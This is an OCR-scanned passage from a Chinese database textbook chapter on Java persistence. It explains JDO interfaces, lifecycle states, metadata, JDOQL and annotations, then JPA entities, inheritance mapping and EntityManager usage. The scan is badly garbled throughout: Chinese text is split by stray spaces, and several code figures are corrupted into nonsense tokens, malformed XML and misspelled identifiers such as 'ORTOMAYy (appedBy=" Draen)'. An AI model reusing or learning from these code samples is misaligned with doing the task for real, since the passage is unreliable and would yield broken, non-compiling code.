的 持久 性 实例 ， 如 果实 例 已 经 被 缓存 ， 则 返回 被 缓存 的 实例 。 和 否则 ， 创 建 一 个 新 
实例 ， 数 据 可 能 被 加 载 也 可 能 不 加 载 ( 某 些 实现 返回 一 个 空 指针 )。 
e Query 接口 支持 应 用 程序 从 数据 源 中 获取 持久 性 实例 。 多 个 Query 实例 可 能 与 一 个 
PersistenceManager 相关 联 ， 并 且 可 能 被 指定 同时 执行 (虽然 JDO 的 实现 一 般 会 按 序 
列 执行 它们 )。 每 个 JDO 开发 商 负 责 实现 这 个 接口 ， 将 JDO 查询 语言 (JDOQL) 转 
换 成 数据 存储 中 使 用 的 本 地 语言 。 
e Extent 接口 给 出 数据 源 中 一 个 类 的 所 有 对 象 的 逻辑 视图 . Extents 从 Persistence- 
Manager 中 获取 ， 还 可 以 被 配置 包含 子 类 。extent 有 两 种 用 途 : (1 ) 遍历 一 个 类 的 所 
有 实例 (2 ) 在 数据 源 中 对 一 个 对 象 的 所 有 实例 执行 查询 。 
e Transaction 接口 包含 了 标记 事务 开始 和 结束 的 方法 。( void begin()，void commit()， 
void rollback() )。 
e。 JDOHelper 类 为 JDO 相关 的 应 用 提供 了 一 些 静 态 方法 ， 可 以 检查 实例 的 运行 时 状 
态 ， 如 果 有 的 话 ， 可 获取 相关 联 的 PersistenceManager。 例 如 ， 应 用 程序 可 以 发 现实 
例 是 否 是 持久 的 、 事 务 性 的 、 脏 的 、 新 的 或 者 已 被 删除 等 。 
JDO 类 的 类 型 
JDO 中 类 有 三 种 类 型 : 
e Persistence-capable : 这 种 类 的 实例 可 以 持久 化 存储 。 注 意 ， 这 种 类 应 用 到 JDO 环境 
之 前 ,需要 根据 JDO 元 数据 规范 进行 增强 。 
@ Persistence-aware : 能 操作 persistence-capable 类 的 类 。JDOHelper 类 提供 方法 ， 允 
许 查询 persistence-capable 类 的 实例 的 持久 状态 。 注 意 ， 这 种 类 也 需要 通过 最 小 JDO 
元 数据 增强 。 
e Normal: 不 可 持久 的 类 ， 也 没有 关于 持久 性 的 知识 。 不 需要 JDO 元 数据 。 
JDO 实例 的 生命 周期 
JDO 管理 一 个 对 象 从 创建 到 删除 的 生命 周期 。 生 命 周期 内 ，JDO 实例 在 不 同 状态 之 间 转 
换 ， 直 至 其 最 终 被 Java 虚拟 机 (Java Virual Machine，JVM) 回收 。 不 同 状 态 之 间 的 转换 通 
过 PersistenceManager 类 的 方法 实现 。 包 括 TransactionManager 一 一 诸如 makePersistent()、 
makeTransient()、deletePersistent() 以 及 这 样 的 操作 导致 的 提交 和 回 滚 变 化 。 表 29-5 展 
示 了 JDO 规范 定义 的 10 个 状态 。 前 7 个 是 必 选 状态 ， 后 面 3 个 是 可 选 状 态 。 如 果 一 个 实现 
不 支持 某 些 操作 ， 则 三 个 可 选 状态 不 可 达 。 


表 29-5 JDO 生命 周期 状态 





状 态 描 述 
Transient (临时 ) 由 开发 者 定义 的 、 不 涉及 持久 环境 的 构造 函数 创建 的 对 象 。 没 有 JDO 实体 与 
临时 实例 关联 
Persistent-new 任何 由 应 用 程序 的 组 件 请 求 ， 通 过 PersistentManager 类 的 makePersistent() 方 
法 转变 为 持久 态 的 对 象 。 这 样 的 对 象 将 有 一 个 被 赋予 的 JDO 标识 
Persistent-dirty 任何 当前 事务 中 被 修改 的 持久 对 象 
Hollow 任何 表示 数据 存储 中 特定 数据 的 持久 对 象 ， 其 值 不 包含 在 实例 中 


Persistent-clean 任何 表示 数据 存储 中 事务 特定 数据 的 持久 对 象 ， 其 值 在 当前 事务 中 从 未 被 修 
改过 
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( 续 ) 

状 态 描 述 
Persistent-deleted 任何 表示 数据 存储 中 特定 数据 的 持久 对 象 ， 并 且 在 当前 事务 中 已 被 删除 
Persistent-new-deleted 任何 在 同一 事务 中 被 变 为 和 删除 的 持久 对 象 
Persistent-nontransactional 任何 表示 数据 存储 中 数据 的 持久 对 象 ， 其 值 当前 被 加 载 ， 但 不 是 事务 一 致 的 
Transient-client 任何 表示 一 个 临时 事务 实例 的 持久 对 象 ， 其 值 在 当前 事务 中 未 被 改变 
Transient-dirty 任何 表示 临时 事务 实例 的 持久 对 象 ， 其 值 在 当前 事务 中 已 被 修改 过 

创建 持久 性 类 


为 了 在 JDO 中 实现 类 的 持久 性 ， 开 发 商 需要 做 到 以 下 几 点 : 

(1 ) 确保 每 个 类 包含 一 个 无 参数 的 构造 器 (构造 子 )。 如 果 类 没有 定义 构造 器 ， 编 译 器 
会 自动 产生 一 个 无 参数 的 构造 器 ， 和 否则 开发 者 需要 指定 一 个 。 

(2 ) 创建 一 个 JDO 元 数据 文件 ( metadata file) 来 标识 持久 性 类 。JDO 元 数据 文件 表示 成 
XML 文档 ， 主 要 用 来 指定 那些 无 法 用 Java 表示 的 持久 性 信息 ， 重 新 定义 缺 省 的 持久 性 行为 ， 以 
及 让 厂商 指定 的 机 制 生效 。 图 29-13 给 出 了 一 个 JDO 元 数据 文件 的 例子 , 使 Branch 类 (由 一 组 
PropertyForRent 对 象 构 成 ) 和 ProertyForRent 类 成 为 持久 性 类 。 联 系 属性 为 1 的 一 方 的 mapped-by 
属性 是 关注 的 焦点 。 该 属性 告知 JDO 实现 寻找 PropertyForRent 类 的 account 字段 。 这 将 在 数据 库 
创建 两 张 表 ， 分别 对 应 Branch 和 PropertyForRent (包含 关联 到 Branch 表 的 branchNo 字段 )。 

3 ) 增强 类 ， 使 它们 能 在 JDO 运行 时 环境 中 使 用 。JDO 规范 描述 了 若干 增强 类 的 方法 ， 
最 通用 的 方法 是 使 用 一 个 增强 程序 ， 它 可 以 读 一 系列 类 文件 和 JDO 元 数据 文件 ， 并 创建 新 的 
增强 类 ， 这 些 类 可 以 在 JDO 环境 下 运行 。 对 类 所 做 一 项 增强 是 实现 一 个 PersistenceCapable 
接口 。 类 增强 应 该 跨 JDO 实现 二 进 制 兼容 。Sun 提供 了 一 个 参考 实现 ， 其 中 包含 引用 增强 


(reference enhancer)。 





<?xml version="],0" encoding="UTF-8" ?> 
<IDOCTYPE jdo PUBLIC "-//Sun Microsystems, Inc.//DTD Java Data Objects Mo 2.0//EN" 
her 2 0.dtd"> 
‘<jdo> 
~ <package name = "com.dreamhome. jdopersistence > 
<class name = "Branch” identity-type = "application" PE ubere, peel ecaphble, 
table = "BRANCH'> 
<field name = "branchNo" primary-key= "trae/> 
<field name ="properties" Persistence-modifier = = "persistent" mapped-by = "branch"> 
<collection element- pe 人 > 
</field> : 
</class> 
<class name = tw identity-type = EL Ee "persistence- 
capable” table ="PROPERTYFORRENT"> ， 
<field name = "propertyNo" primary-key = "true'/> 
<field name = "branch' persistence-modifier = "Persistent' > 
<column name ="branchNo"/> 
</field> 
</class> 
</package> 
</jdo> 





图 29-13 ”指定 持久 性 类 的 JDO 元 数据 文件 的 例 


图 29-14 说 明了 如 何 使 用 JDO 来 连接 到 一 个 数据 库 (使 用 getPersistenceManagerFactory()) 
且 使 一 个 目标 在 事务 处 理 环境 中 (使 用 makePersistent0 ) 持久 运行 。 
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基于 可 达 性 的 持久 性 
正如 27.3 节 所 述 , JDO 支持 基于 可 达 性 的 持久 性 。 因 此 ， 任 何 一 个 持久 性 类 的 临时 对 象 ， 
只 要 它 由 某 个 持久 对 象 可 达 ， 不 论 是 直接 的 还 是 间接 的 ， 在 提交 时 它 都 会 变 成 持久 的 。 实 例 
通过 一 个 或 者 一 组 引用 可 达 。 由 一 个 给 定 的 实例 可 达 的 所 有 实例 的 集合 构成 一 个 对 象 图 ， 称 
为 该 实例 的 相关 实例 完全 闭 包 。 可 达 性 算法 可 用 于 所 有 持久 性 实例 ， 通 过 它们 的 引用 关系 传递 
到 内 存 中 的 实例 ， 使 得 完全 闭 包 都 变 成 持久 的 。 这 使 得 开发 者 可 以 在 内 存 中 构建 复杂 的 对 象 图 ， 
只 需 简 单 地 创建 由 一 个 持久 性 实例 到 该 图 的 引用 ， 就 可 以 使 图 中 所 有 实例 变 成 持久 的 。 删 除 对 
一 个 持久 性 对 象 的 所 有 引用 并 不 会 自动 删除 这 个 实例 。 相 反 ， 实 例 必 须 显 示 地 删除 。 


Properties props = new Properties(); | 

props.setProperty("javax.jdo.option.ConnectionURL", "jdbc:oracle:thin:@oracle-prod:1521:ORA”) 

Props.SetProperty( "javax.jdo.option.ConnectionUserName' ，admin ) 

props.setProperty( "javax,jdo.option.ConnectionPassword", "admin'") 

props.setProperty("javax.jdo.option.ConnectionDriverName", "oracle;jdbc.driver.OracleDriver") 

PersistenceManagerFactor pmf = JDOHelper,getPersistenceManagerFactory(props); 

PersistenceManager pm = pmf.getPersistenceManager(); 

Transaction tx = pm.currentTransaction(); 

PropertyForRent pfr = new PropertyForRent("PA14", "16 Holhead'", "Aberdeen", "AB7 5SU ， Wousa 
6, 650, "CO46", "SA9", "B007"); 


tx.begin(); 
pm.makePersistent(pfr); 
tx.commit(); 
图 29-14 ”让 一 个 对 象 在 JDO 中 成 为 持久 的 
JDO 和 Java 注解 


Java 注解 是 语法 元 数据 的 特殊 形式 ， 可 以 添加 到 Java 源码 中 ， 提 供 关 于 类 、 方 法 、 变 
量 、 人 参数 和 包 的 数据 。 然 而 ， 注 解 不 直接 影响 代码 的 执行 。 和 Javadoc 标记 不 同 ，Java 注解 
是 反射 性 的 (reflective)。 也 就 是 说 ， 注 解 被 舱 和 到 编译 器 产生 的 class 文件 内 ， 执 行 时 可 以 
由 JVM 保存， 从 而 实现 运行 时 可 检索 。Java 注解 早 在 JDK 1.5 时 就 被 加 入 到 Java 语言 
其 主要 功能 如 下 : 

@ 为 编译 器 提供 信息 。 注 解 可 以 帮助 编译 器 检测 错误 、 抑 制 警 告 。 为 方便 语法 检查 ， 

编译 器 预 设 了 一 些 特殊 的 注解 (包括 Deprecated、Override 和 meee i 

e 运行 时 处 理 。 部 分 注解 支持 运行 时 检查 ， 注 解 可 用 于 程序 中 类 、 属 性 、 方 法 和 其 他 

程序 元 素 的 声明 。 

@ 编译 和 部 署 时 处 理 。 软 件 工具 可 以 根据 注解 信息 生成 代码 、XML 文件 等 。 

注解 一 般 出 现在 大 括号 前 面 ， 大 括号 内 可 能 包含 具名 值 或 不 具名 值 。 如 果 注 解 没 有 元 
素 ， 大 括号 可 以 省 略 。JDO2.0 中 ， 数 据 库 的 映射 元 数据 随 Java 类 存储 在 Java 文件 内 ， 而 不 
是 存储 在 单独 的 元 数据 文件 。 例 如 ， 图 29-13 的 JDO 元 数据 文件 能 用 Java 注解 的 形式 重 写 
为 图 29-15 所 示 。 

JDO 查询 语言 (JDOQL ) 

JDOQL 是 一 个 与 数据 源 无 关 的 查询 语言 ， 它 基于 Java 的 布尔 表达 式 。JDOQL 的 语法 
和 Java 的 标准 语法 一 样 ， 只 有 几 处 例外 。 一 个 Query 对 象 用 来 查找 满足 一 定 要 求 的 持久 性 
对 象 ， 可 以 通过 PersistenceManager 的 newQuery() 方法 来 获取 Query。 一 个 基本 的 JDOQL 
查询 主要 包含 以 下 三 个 部 分 : 
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@PersistenceCapable(identityType="application" table=" RANCED 
public class Branch 
{ 


@Persistent(primaryKey="key") 
String branchNo; 


@Persistent 
@Element(types=com.dreamhome, jp tn opety Eee ap eb bane ) 
Set properties = new HashSet(); 

拉 . 


@PersistenceCapable(identityType="application" table="PROPERTYFORRENT") 
public class PropertyForRent 
{ 


@Persistent(primaryKey="key") 
String propertyNo; 


ms 


} 


图 29-15 JDO 注解 示例 


e 一 个 候选 类 (一 般 是 持久 性 类 )。 

。 一 个 包含 持久 性 对 象 的 候选 集合 (一 般 是 一 个 Extent)。 

e 一 个 过 滤器 ， 它 是 用 Java 形式 语法 书写 的 布尔 表达 式 。 

查询 结果 是 候选 集合 的 一 个 子 集 ， 它 仅 包 含 候选 类 中 满足 过 滤器 的 那些 实例 。 过 滤 过 程 
可 能 直接 在 数据 源 执 行 ， 或 者 在 内 存 中 执行 。JDO 并 不 强制 查询 采取 其 中 某 种 机 制 ， 但 是 为 
了 效率 考虑 ， 一 般 实现 会 采取 数据 源 和 在 内 存 执行 这 两 种 方法 的 混合 。 另 外 ， 查 询 可 以 包括 
其 他 可 选 部 分 ， 如 在 过 滤器 字符 串 中 作为 占 位 符 存 在 的 参数 声明 ( 按 正式 的 Java 语法 )、 变 
量 声明 、 导 入 或 者 排序 表达 式 等 。 

看 一 个 简单 的 例子 ， 查 询 月 租 少 于 400 的 出 租房 : 


Query query = pm.newQuery(PropertyForRent.class, “this.rent < 400”); 
Collection result = (Collection) query.execute(); 


在 这 个 例子 中 ， 候 选 类 是 PropertyForRent， 过 滤器 是 “ this.rent < 400”。 当 候选 集合 没 
有 明确 制定 时 ， 就 用 候选 类 的 整个 extent， 即 候选 集合 包含 候选 类 的 所 有 实例 。 这 种 情况 下 ， 
如 果 候 选 类 的 extent 没 被 管理 ， 则 查询 是 不 合法 的 。execute() 方法 编译 并 运行 查询 。 如 果 
在 PropertyForRent 类 中 没有 rent 属性 ， 或 者 有 这 个 属性 但 是 数据 类 型 不 是 Hoat， 则 抛 出 一 
JDOUserException。 如 果 查 询 编译 成 功 ， 则 在 由 数据 源 中 PropertyForRent 实例 构成 的 extent 
上 和 迭代 ， 用 过 滤器 逐个 筛选 每 个 PropertyForRent 实例 ， 只 有 满足 过 滤器 的 实例 才能 被 包含 
在 结果 集中 。 过 滤器 中 的 this 关键 字 表示 被 迭代 到 的 对 象 ， 我 们 还 可 以 这 样 表达 查询 : 


Class pfrClass = PropertyForRent.class; 

Extent pfrExtent = pm.getExtent(pfrClass.class, false); 
String filter = “rent < 400”; 

Query query = pm.newQuery(pfrExtent, filter); 
Collection result = (Collection) query.execute(); 


作为 第 二 个 例子 ， 图 29-16 中 抽取 的 代码 将 上 述 查 询 推广 为 一 个 静态 方法 ， 并 扩展 该 查 
询 以 显示 参数 声明 (declareParameters)、 结 果 排 序 (setOrdering) 以 及 迭代 器 的 使 用 。 

对 JDO 的 详细 描述 超出 了 本 书 的 范围 ， 有 兴趣 的 读者 可 以 参考 JDO 规范 ( Java Community 
Process，2003 ) 和 Jordan and Russell ( 2003 ) 。 
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pele static PropertyForRent a pe a a Bn foet maxRenl 
Class fprClass = PropertyForRent.class; ; ， 


Extent PfrExtent = pr gottent(pfrClass css, ee! 
String filter = “rent < 


PropertyForRent pfr 
if Gter HAsNextO) pf =( RN quiery.close(result); 
return pfr; 


图 29-16 JDO 查询 示例 


使 用 注解 查询 
前 面 已 经 提 到 在 类 文件 中 使 用 注解 可 以 代替 JDO 元 数据 文件 。 类 似 地 ， 我 们 也 可 以 在 
类 文件 中 用 注解 Query 的 方式 定义 单个 具名 查询 ， 而 用 Queries 定义 一 组 具名 查询 。 例 如 : 
@Query(name="BranchB005" language="JDOQL,", 
value="SELECT FROM com.dreamhome.jdopersistence.Branch 
WHERE branchNo == \'BO05\") 
@Queries({ 
@Query(name="BranchB005", language="JDOQL,", 
value="SELECT FROM com.dreamhome.jdopersistence.Branch 
WHERE branchNo == \"B0O0S5\",), 
@Query(name= “BranchB003", language="JDOQL 
value="SELECT FROM com.dreamhome.jdopersistence.Branch 
WHERE branchNo == "B003\") 
}) 


29.7.6 JPA 


JPA (Java Persistence API，Java 持久 化 API) 定义 了 一 个 接口 ， 将 通常 的 Java 对 象 (有 
时 也 称 它 们 为 POJO (Plain Old Java Object) ) 持久 化 到 一 个 数据 存储 中 。JPA 标准 在 2006 
年 6 月 作为 EJB 3.0 的 一 部 分 被 提出 ， 不 过 JPA 也 可 以 在 JEE 容器 外 使 用 。JPA 规定 了 一 个 
实现 必须 提供 的 接口 。 标 准 化 接口 的 目的 在 于 ， 原 理 上 用 户 可 以 不 修改 自身 的 代码 就 在 不 同 
的 JPA 实现 间 切 换 。 最 初 ，JPA 是 JSR-220 专家 小 组 为 简化 EJB CMP 实体 Beans 而 进行 的 
研究 。 然 而 ， 没 过 多 和 久 ， 专 家 组 的 成 员 就 意识 到 仅仅 简化 EJB CMP 是 不 够 的 。 真 正 需要 的 
是 一 整套 与 工业 上 其 他 ORM (O-R mapping) 技术 相 匹敌 的 POJO 持久 化 框架 。 事实 上 ， 当 
EJB 3.0 首次 提出 JPA 时 ,许多 社区 都 要 求 JSR-220 专家 小 组 进一步 推广 JPA。 目 前 ，JPA 
是 JEE 和 JSE 平 台 持久 化 和 对 象 关系 映射 的 标准 API， 不 过 之 前 使 用 的 API 依然 可 用 。 然 
而 JPA 与 RDBMS 数据 源 紧 紧 绑 在 一 起 (虽然 也 存在 支持 其 他 数据 源 的 )，JDO (Java Data 
Objects，Java 数据 对 象 ) 既 提 供 了 关系 型 持久 化 ， 也 支持 其 他 类 型 的 数据 源 的 持久 化 。 

JPA 是 用 于 对 象 - 关系 映射 的 一 个 POJO 持久 化 API。 它 包含 完整 的 对 象 - 关系 映射 规 
范 说 明 ， 支 持 使 用 Java 语言 元 数据 注解 和 XML 描述 符 来 定义 Java 对 象 与 关系 数据 库 之 间 
的 映射 。 对 于 静态 和 动态 查询 ，JPA 支持 一 个 丰富 的 、 类 SQL 的 查询 语言 (EJB-QL 的 一 个 
重要 扩展 )。 它 还 支持 使 用 可 插 拔 的 持久 化 提供 者 。JPA 简化 了 实体 持久 化 的 编程 模型 ， 添 
加 了 许多 EJB 2.1 没有 的 新 特性 。 例 如 ，JPA: 
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要 求 更 少 的 类 和 接口 。 
以 注解 的 形式 代替 元 长 的 配置 描述 。 
以 默认 注解 的 形式 表示 大 多 数 典 型 的 规范 说 明 。 
提供 更 清晰 、 更 简单 、 更 标准 的 对 象 - 关系 映射 。 
增加 对 继承 、 多 态 和 多 样 化 查询 的 支持 。 
增加 对 具名 (静态 ) 和 动态 查询 的 支持 。 
提供 Java 持久 化 查询 语言 ， 是 EJB-QL 的 增强 版 。 
支持 在 容器 之 外 的 使 用 。 
Java 持久 化 查询 语言 (Java Persistence Query Language，JPQL) 用 于 查询 存在 关系 数据 库 
中 的 实体 。 语 法 上 ， 它 虽然 与 SQL 查询 类 似 , 但 操作 上 ， 它 是 针对 实体 对 象 而 不 是 数据 库 表 。 
实体 
持久 性 实体 本 质 上 是 轻 量 级 的 Java 类， 通常 表述 关系 数据 库 的 一 张 表 。 实 体 的 实例 对 
应 表 内 单独 的 行 。 实 体 通 常 与 其 他 实体 之 间 存 在 联系 ， 这 种 关联 通过 对 象 /关系 元 数据 表 
示 。 对 象 /关系 元 数据 既 可 以 在 Java 类 文件 中 使 用 注解 直接 表示 ,也 可 以 在 随 应 用 分 布 的 
独立 的 XML 描述 文件 中 表述 。 和 其 他 POJO 类 似 ， 一 个 实体 既 可 以 是 抽象 类 也 可 以 是 具体 
类 ， 并 且 还 可 以 扩展 另 一 个 POJO。 正 如 图 29-17 所 示 ， 使 用 javax.persistence.Entity 注解 标 
注 一 个 对 象 为 一 个 实体 。 


Package dreamhome; 
import java,io.Serializable; 
import java.util.Collection; 


@NamedQuery(name="fmdAllBranches", guery= "selectb from Branch b") 
@Table(name="BRANCH") 
public class Branch implements Serializable { 

@Id 

@Column(nullable=false) 

protected String branchNo; 

@Column(name="Street") 

protected String street; 


ORTOMAYy (appedBy=" Draen) 
Pprotected Collection<Staff> employees; 
public Branch() 分 


public Collection<Staffs getStaff() { 
return employees; 


Public void setStaff(Collection<Staff> employees) { 
this.employees=employees; 


} 

public Staff addStaff(Staff employee) { 
getStaff().add(employee); 
employee.setBranch(this); 
return employee; 


} 

public Staff removeStaff(Staff employee) { 
getStaff().remove(employee); 
employee.setBranch(null); 
return employee; 


图 29-17 使 用 JPA 定义 类 的 例子 
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每 个 实体 都 有 一 个 主 关键 字 ，id 注解 就 表示 某 一 个 持久 性 字段 或 属性 为 主 关键 字 。 一 个 
实体 或 使 用 字段 (field) 或 使 用 属性 ( property) 维护 自身 状态 (通过 getter 和 setter 方法 )。 
具体 属于 哪 种 方式 取决 于 O-R 映射 注解 的 位 置 。 图 29-17 采用 字段 的 方式 说 明 branchNo 字 
段 是 主 关键 字 。 注 意 ， 在 一 个 实体 层次 结构 内 ， 无 论 是 采用 字段 还 是 属性 方式 ， 所 有 实体 的 
访问 类 型 必须 一 致 。 例 如 ， 以 属性 的 访问 方式 描述 branchNo: 

@Id 

public Long getBranchNo() { 

return branchNo; 

i void setBranchNo(Long branchNo) { 

this.branchNo = branchNo; 

} 

实体 中 定义 的 每 一 个 字段 默认 都 是 持久 性 的 。 为 了 指明 某 个 字段 /属性 不 保存 ， 用 
Transient 注解 标记 它 ， 或 者 使 用 transient 修饰 符 。 

联系 

联系 可 以 使 用 一 对 一 、 一 对 多 、 多 对 一 或 者 多 对 多 注解 表示 。 上 面 的 例子 中 ， 定 义 了 
Branch 和 Staff 实体 的 一 对 多 的 双向 联系 。 双 向 联系 中 ，mappedBy 元 素 通过 指定 关联 的 字 
段 或 属性 名 说 明 联 系 中 反 向 端 。 

对 象 - 关系 (Object-Relational，O-R ) 映射 标准 化 

我 们 可 以 通过 Java 元 数据 注解 或 者 XML 文件 指定 实体 间 的 O-R 映射 。EJB 3.0 JPA 针 
对 O-R 映射 定义 了 Table 、SecondaryTable 、Column 、JoinColumn 和 PrimaryKeyJoinColumn 
等 注解 。 上 述 示例 中 ， 我 们 使 用 Table 注解 定义 实体 所 映射 的 表 的 名 称 。 如 果 映 射 的 表 没 有 
指出 ，EJB 3.0 JPA 持久 化 提供 者 默认 将 实体 映射 到 与 其 名 称 一 致 的 数据 表 。Column 注解 被 
用 于 把 持久 化 字段 或 者 属性 映射 到 数据 库 列 (同样 默认 映射 到 同名 列 )。 

实体 继承 

EJB 3.0 JPA 支持 多 种 方式 的 实体 继承 。 下 面 以 子 类 Manager 和 Secretary 扩展 Staff 为 
例 ， 讨 论 三 种 继承 策略 : 

e 默认 每 个 类 层次 结构 对 应 一 张 表 (SINGLE TABLE)。 在 这 种 情况 下 ，Sta 仔 、Manager、 
Secretary 三 个 类 映射 到 同一 张 名 为 STAFF 的 表 。 表 中 有 专门 一 个 区 分 列 说 明 每 行 对 应 
的 实体 类 型 。 自 然 ， 类 层次 结构 的 每 一 个 实体 都 给 了 一 个 唯一 的 值 存在 该 列 。 省 缺 情 
况 下 ， 实 体 的 区 分 值 即 为 实体 名 称 ， 而 实体 可 以 使 用 DiscriminatorValue 注解 自 定 义 区 
分 值 。 图 29-18 详细 说 明了 这 一 映射 策略 。 由 于 仅仅 使 用 一 张 表 ， 所 以 该 方法 的 性 能 
最 好 。 但 另 一 方面 ， 任 何 具体 类 的 属性 不 能 被 映射 到 非 空 列 〈 皆 因 所 有 子 类 存储 在 同 
一 张 主 表 里 )。 

一 个 具体 类 对 应 一 张 表 (TABLE PER_CLASS)。 所 有 具体 类 的 属性 ， 包 括 继承 属 
性 ， 被 映射 到 一 张 表 的 各 列 中 。 该 方法 要 求 类 层次 结构 中 实体 所 映射 的 表 结构 应 该 
具有 一 致 的 主 关键 字 列 ， 包 括 名 称 和 类 型 一 致 。 采 用 这 种 方式 ， 我 们 需要 创建 两 张 
表 ， 比 如 MANAGER 和 SECRETARY。 抽 象 类 Sta 任 的 属性 需要 拷贝 到 两 张 表 中 。 
由 于 该 方法 对 多 态 联系 的 支持 不 佳 ，JPA 1.0 规范 中 该 方法 是 可 选 的 。 

每 个 类 一 张 表 (JOINED )。 类 层次 结构 的 根 ( Staff) 映射 到 一 张 根 表 。 根 表 定 义 了 该 
层次 结构 中 所 有 表 使 用 的 主 关键 字 结 构 、 区 分 列 和 版 本 列 (可 选 )。 层 次 结构 中 其 他 
表 使 用 和 根 表 一 致 的 主 关键 字 结构 并 且 可 以 选择 性 地 定义 自身 ID 列 和 根 表 ID 列 的 
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外 键 约束 。 非 根 表 不 包含 鉴别 或 版 本 列 。 因 为 层次 结构 的 每 个 实体 实例 的 数据 横 跨 
了 自身 表 和 父 类 表 ， 所 以 该 方法 等 价 于 根 表 和 非 根 表 的 连接 。 对 任 一 类 型 任 一 字段 
的 查询 ， 都 需要 连接 所 有 父 类 表 和 子 表 。 









， ce coset lheranee ype SINGLE TABLE) 

Oe 'STAFF TYP. 

0 rType=] DiscriminatorType STRTNG, length=1) ， 
publie ab Staff i implements Serializable{ 








Poeed Dende commission; 





图 29-18 JPA 采用 SINGLE_TABLE 策略 实现 继承 示例 


JPA 运行 时 

对 象 模型 映射 完 后 ， 持 久 性 开发 的 下 一 步 就 是 依据 应 用 编码 实现 对 对 象 的 访问 和 处 
理 。JPA 的 javax.persistence 包 提 供 了 运行 时 API。 其 中 主要 的 运行 时 类 是 EntityManager 
类 ， 该 类 提供 了 创建 查询 、 访 问 事务 以 及 对 对 象 进 行 查询 、 持 和 久 化 、 合 并 和 删除 等 操作 的 
API。JPA API 可 以 在 包括 JSE 和 JEE 在 内 的 任何 Java 环境 中 使 用 。EntityManager 能 通过 
EntityManagerFactory 创建 ， 被 注入 到 EJB 会 话 Bean 的 实例 变量 中 ,或 者 在 JEE 服务 器 上 
在 JNDI 中 查找 。 另 外 ，JPA 在 JSE 和 JEE 的 使 用 方法 是 不 同 的 。 

JSE JSE 中 ，JPA Persistence 类 通过 createEntityManagerFactory API 访问 EntityManager。 
所 有 的 JSE JPA 应 用 程序 必须 定义 persistence.xml 文件 ， 该 文件 定义 了 持久 单元 ， 包括 名 称 、 
类 、ORM 文件 、 数 据 源 和 供应 商 相 关 信 息 。 只 有 持久 单元 名 称 传 给 createEntityManager。 奇 
怪 的 是 ，JPA 没有 提供 标准 化 方法 规定 在 JSE 内 如 何 连 接 数据 库 ， 因 此 每 个 JPA 提供 者 必须 提 
供 各 自 关 于 设置 JDBC 驱动 管理 类 、URL、 用 户 名 和 密码 等 的 持久 性 特性 。 另 外 ，JPA 规定 
了 设置 数据 源 JNDI 名 称 的 方法 ， 该 方法 通常 在 JEE 使 用 。 图 29-19 展示 了 persistence.xml 
文件 的 样 例 。 借 助 EntityManagerFactory， 我 们 可 以 如 下 访问 EntityManager: 


import javax.persistence.EntityManagerFactory; 
import javax.persistence.Persistence; 


EntityManagerFactory factory = Persistence.createEntityManagerFactory 
("dreamhome"); 
EntityManager entityManager = factory.createEntityManager(); 


// 与 实体 管理 器 一 道 工作 

erityManager loselh 

factory.close(); /应 用 程序 结尾 处 关闭 

调用 Persistence.createEntityManagerFactory() 时 ， 持 久 性 实现 会 试图 在 persistence.xml 中 
寻找 与 参数 所 指定 名 称 ( 上 例 中 是 “ dreamhome ”) 匹配 的 实体 管理 者 。 如 果 查 找 失 败 ， 将 会 


引发 PersistenceException。 
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29-19 JPA persistence.xml 文件 示例 





JEE 在 JEE 中 ，EntityManager 或 EntityManagerFactory 既 可 以 在 JNDI 中 查找 ， 也 可 
以 被 注入 到 会 话 Bean 中 。 在 JNDI 中 查找 EntityManager， 要 求 EntityManager 在 JNDI 中 公 
开 声 明 ， 例 如 在 SessionBean 的 ejb-jar.xml 文件 中 通过 一 个 <Persistence-contxt-ref> 声明 ， 如 
图 29-20 所 示 。 要 注入 一 个 EntityManager 或 EntityManagerFactory， 可 使 用 注解 Persistence- 
Context 或 PersistenceUnit。JEE 中 ， 一 个 EntityManager 可 以 是 有 管理 (容器 管理 ) 的 ， 也 
可 以 是 无 管理 (应 用 管理 )。 有 管理 的 EntityManager 与 由 应 用 管理 的 相 比 ， 生 命 周 期 不 同 。 
有 管理 的 EntityManager 应 该 从 不 关闭 ， 与 JTA (Java Transaction API，Java 事务 API) 事务 
集成 ， 因 此 不 能 使 用 本 地 事务 。 越 过 JTA 事务 边界 ， 由 有 管理 EntityManager 读 取 和 持久 化 
的 实体 变 为 分 离 的。 在 JTA 事务 之 外 ， 有 管理 EntityManager 的 行为 有 时 会 发 生 异 常 ， 所 以 
它 一 般 只 在 JTA 事务 内 部 应 用 。 





图 29-20 JPA ejb-jar.xml 文件 示例 


无 管理 的 EntityManager， 由 应 用 程序 通过 EntityManagerFactory 创建 或 者 直接 由 Persistence 
创建 。 无 管理 EntityManager 必须 关闭 ， 它 通常 不 与 JTA 事务 集成 ， 但 可 以 借助 joinTransaction 
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API 实现 集成 。 事 务 结束 后 ， 无 管理 EntityManager 中 的 实体 也 不 会 变 为 分 离 的 ， 即 它们 可 以 在 
后 续 事 务 中 继续 使 用 。 

图 29-21a 说 明 一 个 SassionBean 如 何在 JNDI 中 查找 EntityManager ; 图 29-21b 说 明 一 
个 SassionBean 如 何在 JNDI 中 查找 EntityManagerFactory ; 图 29-21c 说 明了 在 SassionBean 
中 如 何 注 入 EntityManager 和 EntityManagerFactory。 


InitialContext context = new InitialContext(); 
EntityManager entityManager = 
(EntityManager)context.lookup("java:comp/env/persistence/dreamhome/entity-manager ); 


a) SassionBean 在 JNDI 中 查找 EntityManager 
InitialContext context = new InitialContext(); 
EntityManagerFactory factory = 
(EntityManagerFactory)context.lookup("java:comp/env/persistence/dreamhome/factory’"); 


b) SassionBean 在 JNDI 中 查找 EntityManagerFactory 


@Stateless(name="StaffService", mappedName="dreamhome/StaffService’) 
@RemotelStaffService.class) 
public class StaffServiceBean implements StaffService { 
@PersistenceContext(unitName= dreamhome ) 
Private EntityManager entityManager; 
@PersistenceUnit(unitName="dreamhome'") 
private EntityManagerFactory factory; 


c) SassionBean 注 人 EntityManager 和 EntityManagerFactory 


图 29-21 


涉及 数据 库 修改 的 实体 管理 操作 必须 在 事务 中 完成 。 表 29-6 列 出 了 EntityManager 接口 
操作 实体 的 关键 方法 。 例 如 ， 持 久 化 Staff 的 一 个 实例 可 用 如 下 代码 : 


@PersistenceContext(unitrName="“dreamhome”) 
private EntityManager em; 


Staff s = new Staff(); 
s.setName("John”) 
s.salary(new Double(30000.0)); 
em.persist(s); 


表 29-6 EntityManager 接口 的 关键 方法 


方 法 作 用 
public void persist (Object entity); 持久 化 实体 实例 
public <T> T merge (T entity); 归并 一 个 分 离 的 实体 实例 
public void remove (Object entity ); 移 除 一 个 实体 实例 
